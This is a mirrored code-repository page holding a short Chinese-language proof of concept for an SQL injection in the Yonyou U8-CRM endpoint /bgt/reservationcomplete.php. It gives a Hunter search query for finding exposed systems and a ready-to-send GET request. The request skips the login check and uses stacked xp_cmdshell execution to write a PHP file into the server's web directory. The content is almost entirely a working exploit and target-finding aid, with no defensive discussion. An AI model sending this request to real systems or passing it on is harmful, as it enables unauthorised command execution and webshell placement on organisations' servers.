admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-13 01:43:49 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/用友OA/用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

18 lines
410 B
Markdown
Raw Blame History

# 用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞
用友U8-CRM系统接口 /bgt/reservationcomplete.php 存在SQL注入漏洞
## hunter
```yaml
app.name="用友 CRM"
```
## poc
```java
GET /bgt/reservationcomplete.php?DontCheckLogin=1&ID=1112;exec%20master..xp_cmdshell%20%27echo%20^%3C?php%20echo%20hello;?^%3E%20%3E%20D:\U8SOFT\turbocrm70\code\www\hello.php%27; HTTP/1.1
Host:
```
Reference in New Issue View Git Blame Copy Permalink